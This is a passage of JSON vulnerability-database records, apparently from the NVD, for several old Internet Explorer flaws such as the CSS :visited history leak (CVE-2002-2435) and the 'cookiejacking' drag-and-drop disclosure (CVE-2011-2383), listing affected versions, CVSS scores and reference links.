"matchCriteriaId": "6876CE89-AA70-44C5-8A69-E2ED7A63F570",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2800:*:*:*:*:*:*:*",
"matchCriteriaId": "93F47C82-E767-47A8-88DE-417B004ED7FC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2800.1106:*:*:*:*:*:*:*",
"matchCriteriaId": "F86E7189-CE21-4007-A3FA-39A6B51A5AB9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.2800.1106:*:*:*:*:*:*:*",
"matchCriteriaId": "BCE2555F-C4BE-482F-8DD9-976D2026058C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2900:*:*:*:*:*:*:*",
"matchCriteriaId": "7B90EA4B-DA10-44B7-BD3D-6AE1197212D5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2900.2180:*:*:*:*:*:*:*",
"matchCriteriaId": "7CBF9B51-5AF4-4317-9768-21D866AC7990",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.2900.2180:*:*:*:*:*:*:*",
"matchCriteriaId": "61F352FE-C22E-4B33-A46F-77A164B5DABB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.3663.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "5ACD5A44-0926-4A1B-9900-1E7CC0A561C8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.3718.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "196CEE37-2E3A-41A7-9AC1-0D5CC3F35D8F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.3790.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "3E16BEF4-71AA-4E23-B438-D25FFABDB646",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.3790.1830:*:*:*:*:*:*:*",
"matchCriteriaId": "1F32702E-F955-4DDB-B235-7C47E882453C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.3790.3959:*:*:*:*:*:*:*",
"matchCriteriaId": "6FA2B4AD-C04D-4A6B-8570-5A2F5489F750",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7:*:*:*:*:*:*:*",
"matchCriteriaId": "1A33FA7F-BB2A-4C66-B608-72997A2BD1DB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "6BC71FD8-D385-4507-BD14-B75FDD4C79E6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0:beta:*:*:*:*:*:*",
"matchCriteriaId": "506711D9-6E57-4EED-8628-36C7F2324040",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0:beta1:*:*:*:*:*:*",
"matchCriteriaId": "ED471260-0272-431F-A91E-AC2883D92497",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0:beta2:*:*:*:*:*:*",
"matchCriteriaId": "63D18070-EC48-4904-9AE0-558F7F3B869D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0:beta3:*:*:*:*:*:*",
"matchCriteriaId": "86584E3F-3B0D-4018-A186-E59F3B01CA5C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0.5730:unknown:gold:*:*:*:*:*",
"matchCriteriaId": "817636ED-5E42-460E-89F1-24D5C64AB8BE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0.5730.11:*:*:*:*:*:*:*",
"matchCriteriaId": "0E6E1020-1017-4670-9316-27C79F1E2698",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.00.5730.1100:*:*:*:*:*:*:*",
"matchCriteriaId": "37F63AE1-8FC9-4C0F-8D19-F17DFA214E94",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.00.6000.16386:*:*:*:*:*:*:*",
"matchCriteriaId": "35B1186A-FA5B-4E49-8C2F-BCD2D45F22A2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.00.6000.16441:*:*:*:*:*:*:*",
"matchCriteriaId": "53D75496-8594-44DB-B5C4-EA3CABD6551A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:8.0.6001:*:*:*:*:*:*:*",
"matchCriteriaId": "5F709B61-F64B-4E8F-80BB-4944485B6125",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:8.0.6001:beta:*:*:*:*:*:*",
"matchCriteriaId": "612B8367-DAEF-4EE3-BC57-16A5CF4D3030",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The Cascading Style Sheets (CSS) implementation in Microsoft Internet Explorer 8.0 and earlier does not properly handle the :visited pseudo-class, which allows remote attackers to obtain sensitive information about visited web pages via a crafted HTML document, a related issue to CVE-2010-2264."
},
{
"lang": "es",
"value": "La implementaci\u00f3n de las Hojas de Estilo en Cascada (CSS) en Microsoft Internet Explorer, no controla correctamente el :visited pseudo-class, lo que permite a atacantes remotos obtener informaci\u00f3n sensible acerca de las p\u00e1ginas web visitadas a trav\u00e9s de un documento HTML manipulado. Relacionado con CVE-2010-2264."
}
],
"id": "CVE-2002-2435",
"lastModified": "2025-04-11T00:51:21.963",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2011-12-07T19:55:00.987",
"references": [
{
"source": "cve@mitre.org",
"url": "http://bugzilla.mozilla.org/show_bug.cgi?id=147777"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "http://w2spconf.com/2010/papers/p26.pdf"
},
{
"source": "cve@mitre.org",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/71817"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://bugzilla.mozilla.org/show_bug.cgi?id=147777"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://w2spconf.com/2010/papers/p26.pdf"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/71817"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-200"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2011-2383
Vulnerability from fkie_nvd - Published: 2011-06-03 17:55 - Updated: 2025-04-11 00:51

| Vendor | Product | Version |
|---|---|---|
| microsoft | ie | 9 |
| microsoft | internet_explorer | * |
| microsoft | internet_explorer | 3.0 |
| microsoft | internet_explorer | 4.0 |
| microsoft | internet_explorer | 5 |
| microsoft | internet_explorer | 6 |
| microsoft | internet_explorer | 7 |
| microsoft | internet_explorer | 8 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:microsoft:ie:9:beta:*:*:*:*:*:*",
"matchCriteriaId": "4594B15E-22ED-4DDE-B35A-2CF8F4629729",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4FF2A1DF-843B-4276-AC4E-EF6BC3CACCA9",
"versionEndIncluding": "9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "1BBF9241-A175-438C-A793-3D245BE2AE35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A5B815D9-BC21-4A17-AF00-B8AD181027D7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5:*:*:*:*:*:*:*",
"matchCriteriaId": "B4071D03-D955-4C1B-ACD8-A864F7D0FA02",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6:*:*:*:*:*:*:*",
"matchCriteriaId": "693D3C1C-E3E4-49DB-9A13-44ADDFF82507",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7:*:*:*:*:*:*:*",
"matchCriteriaId": "1A33FA7F-BB2A-4C66-B608-72997A2BD1DB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:8:*:*:*:*:*:*:*",
"matchCriteriaId": "A52E757F-9B41-43B4-9D67-3FEDACA71283",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Microsoft Internet Explorer 9 and earlier does not properly restrict cross-zone drag-and-drop actions, which allows user-assisted remote attackers to read cookie files via vectors involving an IFRAME element with a SRC attribute containing an http: URL that redirects to a file: URL, as demonstrated by a Facebook game, related to a \"cookiejacking\" issue, aka \"Drag and Drop Information Disclosure Vulnerability.\" NOTE: this vulnerability exists because of an incomplete fix in the Internet Explorer 9 release."
},
{
"lang": "es",
"value": "Microsoft Internet Explorer versi\u00f3n 9 y anteriores, no restringen apropiadamente las acciones de arrastrar y soltar en zona cruzada, lo que permite a los atacantes remotos asistidos por el usuario leer archivos de cookies por medio de vectores que involucran un elemento IFRAME con un atributo SRC que contiene una URL http: que redirecciona hacia URL file:, como es demostrado por un juego de Facebook, relacionado con un problema de \"cookiejacking\", tambi\u00e9n se conoce como \"Drag and Drop Information Disclosure Vulnerability\". NOTA: esta vulnerabilidad se presenta debido a una correcci\u00f3n incompleta en la versi\u00f3n 9 de Internet Explorer."
}
],
"id": "CVE-2011-2383",
"lastModified": "2025-04-11T00:51:21.963",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2011-06-03T17:55:00.840",
"references": [
{
"source": "cve@mitre.org",
"url": "http://conference.hackinthebox.org/hitbsecconf2011ams/?page_id=1388"
},
{
"source": "cve@mitre.org",
"url": "http://ju12.tistory.com/attachment/cfile4.uf%40151FAB4C4DDC9E0002A6FE.ppt"
},
{
"source": "cve@mitre.org",
"url": "http://news.cnet.com/8301-1009_3-20066419-83.html"
},
{
"source": "cve@mitre.org",
"url": "http://www.eweek.com/c/a/Security/IE-Flaw-Lets-Attackers-Steal-Cookies-Access-User-Accounts-402503/"
},
{
"source": "cve@mitre.org",
"url": "http://www.informationweek.com/news/security/vulnerabilities/229700031"
},
{
"source": "cve@mitre.org",
"url": "http://www.networkworld.com/community/node/74259"
},
{
"source": "cve@mitre.org",
"url": "http://www.theregister.co.uk/2011/05/25/microsoft_internet_explorer_cookiejacking/"
},
{
"source": "cve@mitre.org",
"url": "http://www.youtube.com/watch?v=V95CX-3JpK0"
},
{
"source": "cve@mitre.org",
"url": "http://www.youtube.com/watch?v=VsSkcnIFCxM"
},
{
"source": "cve@mitre.org",
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-057"
},
{
"source": "cve@mitre.org",
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12820"
},
{
"source": "cve@mitre.org",
"url": "https://sites.google.com/site/tentacoloviola/cookiejacking/Cookiejacking2011_final.ppt"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://conference.hackinthebox.org/hitbsecconf2011ams/?page_id=1388"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://ju12.tistory.com/attachment/cfile4.uf%40151FAB4C4DDC9E0002A6FE.ppt"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://news.cnet.com/8301-1009_3-20066419-83.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.eweek.com/c/a/Security/IE-Flaw-Lets-Attackers-Steal-Cookies-Access-User-Accounts-402503/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.informationweek.com/news/security/vulnerabilities/229700031"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.networkworld.com/community/node/74259"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.theregister.co.uk/2011/05/25/microsoft_internet_explorer_cookiejacking/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.youtube.com/watch?v=V95CX-3JpK0"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.youtube.com/watch?v=VsSkcnIFCxM"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-057"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12820"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://sites.google.com/site/tentacoloviola/cookiejacking/Cookiejacking2011_final.ppt"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-20"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2011-2382
Vulnerability from fkie_nvd - Published: 2011-06-03 17:55 - Updated: 2025-04-11 00:51
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:microsoft:ie:9:beta:*:*:*:*:*:*",
"matchCriteriaId": "4594B15E-22ED-4DDE-B35A-2CF8F4629729",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CB024757-60F3-44F9-BCFF-04B2F109D7A2",
"versionEndIncluding": "8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "1BBF9241-A175-438C-A793-3D245BE2AE35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:3.0.1:*:*:*:*:*:*:*",
"matchCriteriaId": "F62AC866-A06F-47DB-AEDF-E345CE0B14A4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:3.0.2:*:*:*:*:*:*:*",
"matchCriteriaId": "943D5C5C-FC49-4EDE-AE75-A79CFF42208E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:3.1:*:*:*:*:*:*:*",
"matchCriteriaId": "59EB6841-0427-479B-8771-06DF62EE3C87",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:3.2:*:*:*:*:*:*:*",
"matchCriteriaId": "8873A08F-D4C7-46FC-8FE5-972644F85ADA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A5B815D9-BC21-4A17-AF00-B8AD181027D7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.0.1:*:*:*:*:*:*:*",
"matchCriteriaId": "42502347-DD40-4F8C-9861-C0A88A3F8608",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.0.1:sp1:*:*:*:*:*:*",
"matchCriteriaId": "0AF9C64F-9A67-4BA9-A653-75507935E6EA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.0.1:sp2:*:*:*:*:*:*",
"matchCriteriaId": "C375A9AA-505B-444C-A45F-2BAAD0B2CD0D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.01:*:*:*:*:*:*:*",
"matchCriteriaId": "B9D82B89-456D-41CB-A894-B6A22FB4415D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.1:*:*:*:*:*:*:*",
"matchCriteriaId": "44FF4E47-AD75-42C7-BB84-42BBA46A58B2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.01:sp1:*:*:*:*:*:*",
"matchCriteriaId": "2E21CE6E-2B33-4225-B1DC-C19F1D578040",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.5:*:*:*:*:*:*:*",
"matchCriteriaId": "1B26CE22-E730-4247-853E-5E640DB3ECB5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.40.308:*:*:*:*:*:*:*",
"matchCriteriaId": "0A652453-AB5F-405C-ABDE-CE1B54FEACED",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.40.520:*:*:*:*:*:*:*",
"matchCriteriaId": "141080AB-48DE-4885-BAB6-6F0937ABD49B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.70.1155:*:*:*:*:*:*:*",
"matchCriteriaId": "EB758D76-B7F6-4E87-B88D-620443655CA9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.70.1158:*:*:*:*:*:*:*",
"matchCriteriaId": "28655AC5-1512-4F45-9963-CA26F73981CE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.70.1215:*:*:*:*:*:*:*",
"matchCriteriaId": "C00F4F36-B88A-4FDB-BE52-83C6EF60BDB7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.70.1300:*:*:*:*:*:*:*",
"matchCriteriaId": "BEC05584-F553-4D29-9C46-C9EE5F0CB166",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.71.544:*:*:*:*:*:*:*",
"matchCriteriaId": "B108A86E-8387-446C-B823-BE6FCAE747A5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.71.1008.3:*:*:*:*:*:*:*",
"matchCriteriaId": "BA3F79B8-512A-4B88-868C-7C4ADFD223C9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.71.1712.6:*:*:*:*:*:*:*",
"matchCriteriaId": "078C3A86-C9F8-4A19-9DDC-1065B54E640F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.72.2106.8:*:*:*:*:*:*:*",
"matchCriteriaId": "9030923C-356E-4FAB-8E64-03D462B4DB5F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.72.3110.8:*:*:*:*:*:*:*",
"matchCriteriaId": "DC0FFABC-8BED-4838-85FE-406DC9CF9B92",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.72.3612.1713:*:*:*:*:*:*:*",
"matchCriteriaId": "C9DB4A00-4F70-4189-81BD-9318C52DF2D2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5:*:*:*:*:*:*:*",
"matchCriteriaId": "B4071D03-D955-4C1B-ACD8-A864F7D0FA02",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E6B8985B-B927-4928-B1DB-18E29F796992",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.0.1:*:*:*:*:*:*:*",
"matchCriteriaId": "3A04FEA6-37B0-44B0-844F-55652ABA1F85",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.0.1:sp1:*:*:*:*:*:*",
"matchCriteriaId": "4D56FB8E-2553-47C1-82A2-9E59023780CE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.0.1:sp2:*:*:*:*:*:*",
"matchCriteriaId": "8541EEED-94F4-42F8-9719-57F3EC85D52B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.0.1:sp3:*:*:*:*:*:*",
"matchCriteriaId": "40372520-08CF-4F64-A7AC-7E0AE0964138",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.0.1:sp4:*:*:*:*:*:*",
"matchCriteriaId": "2EB39B99-91A0-4B70-B12A-BA37F6AFBA83",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.0518.10:*:*:*:*:*:*:*",
"matchCriteriaId": "FBFE8C8E-F46C-4179-AE83-CE4720C8E0E9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.0910.1309:*:*:*:*:*:*:*",
"matchCriteriaId": "61125B09-23AA-4D5A-8332-6B5CCD80C7A6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2014.0216:*:*:*:*:*:*:*",
"matchCriteriaId": "3AECF59F-B3C0-44CC-B77A-30E32B3E8BB5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2314.1003:*:*:*:*:*:*:*",
"matchCriteriaId": "D4690B85-86B9-448E-9249-B3885DEDC60E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2516.1900:*:*:*:*:*:*:*",
"matchCriteriaId": "4E215C82-E4AD-4B87-92D8-DD4D486EB6EF",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2614.3500:*:*:*:*:*:*:*",
"matchCriteriaId": "D91F4C80-3B1B-45BD-966F-C9DBF98B875D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2919.800:*:*:*:*:*:*:*",
"matchCriteriaId": "F65E0DC1-40F6-4252-945A-A972343D1E29",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2919.3800:*:*:*:*:*:*:*",
"matchCriteriaId": "8C07C1A9-1A94-4653-8C57-6FCFC25854E4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2919.6307:*:*:*:*:*:*:*",
"matchCriteriaId": "EDC57519-AD96-4ECF-A5B2-4E45F7D55298",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2920.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "37DE3DE6-A355-41F2-BF5E-E7526449E753",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.3103.1000:*:*:*:*:*:*:*",
"matchCriteriaId": "5DB24B4F-44FF-4F0F-90FA-240A34B9599F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.3105.0106:*:*:*:*:*:*:*",
"matchCriteriaId": "919A6551-DB18-49BD-AB92-4C453B3B728F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.3314.2101:*:*:*:*:*:*:*",
"matchCriteriaId": "C512DAB3-2720-42D2-B27E-28F30FE0FE46",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.3315.1000:*:*:*:*:*:*:*",
"matchCriteriaId": "CB90458F-1F2B-4F4C-88C6-4B670787D126",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.3502.1000:*:*:*:*:*:*:*",
"matchCriteriaId": "6C2EFDB4-97C2-4DDF-8A65-FCFB60FCB540",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.3700.1000:*:*:*:*:*:*:*",
"matchCriteriaId": "4A99CDC7-9341-4DFB-BB18-FF06C05FF9B0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.01:*:*:*:*:*:*:*",
"matchCriteriaId": "6219D36E-9E2C-4DC7-8FD5-FAD144A333F6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "B1CFF390-FF33-45CA-BC96-C6766491C616",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.01:sp1:*:*:*:*:*:*",
"matchCriteriaId": "3BFFB565-F656-43E3-89E1-E412DC4C9D41",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.01:sp2:*:*:*:*:*:*",
"matchCriteriaId": "BD3A3282-8842-4708-AF7B-0AFBEB5D4F9A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.01:sp3:*:*:*:*:*:*",
"matchCriteriaId": "F4336F0E-75FE-4592-9D98-4F689804956E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.01:sp4:*:*:*:*:*:*",
"matchCriteriaId": "F3F2A51E-2675-4993-B9C2-F2D176A92857",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.2.3:*:*:*:*:*:*:*",
"matchCriteriaId": "DA6E5E4B-9E95-4019-8622-6E707FEC2FF6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.5:*:*:*:*:*:*:*",
"matchCriteriaId": "40F8042F-C621-45AE-9F8C-70469579643A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.5:preview:*:*:*:*:*:*",
"matchCriteriaId": "8E93C22E-812E-4CDA-9850-2386CE1E817A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.5:sp1:*:*:*:*:*:*",
"matchCriteriaId": "2CD04E07-3664-4D4F-BF3E-6B33AF0F2D12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.5:sp2:*:*:*:*:*:*",
"matchCriteriaId": "D05ED9D0-CF78-4FAD-9371-6FB3D5825148",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.50.3825.1300:*:*:*:*:*:*:*",
"matchCriteriaId": "8BA6BA38-8B3B-4B9A-95BF-BCD412DD83B6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.50.4030.2400:*:*:*:*:*:*:*",
"matchCriteriaId": "01BD2A05-3FCE-4C5D-8228-968630F27E28",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.50.4134.0100:*:*:*:*:*:*:*",
"matchCriteriaId": "4430779C-C678-4950-AE9E-82CDFC1A08D7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.50.4134.0600:*:*:*:*:*:*:*",
"matchCriteriaId": "BF0EC334-AEAD-43CA-A609-C027060F4F20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.50.4308.2900:*:*:*:*:*:*:*",
"matchCriteriaId": "BAF320BE-F022-4E0E-9815-B8AEED87B384",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.50.4522.1800:*:*:*:*:*:*:*",
"matchCriteriaId": "75532B2D-6814-4D20-8AEB-E7DFD66B6423",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.50.4807.2300:*:*:*:*:*:*:*",
"matchCriteriaId": "83802E30-8E7D-4CAB-B8FC-10056CF833D6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6:*:*:*:*:*:*:*",
"matchCriteriaId": "693D3C1C-E3E4-49DB-9A13-44ADDFF82507",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6:sp1:*:*:*:*:*:*",
"matchCriteriaId": "D47247A3-7CD7-4D67-9D9B-A94A504DA1BE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A19F6133-25D1-44A5-B6B9-354703436783",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.2462.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "314538E8-48EC-4869-9074-2A1F5B7CBB3C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.2479.0006:*:*:*:*:*:*:*",
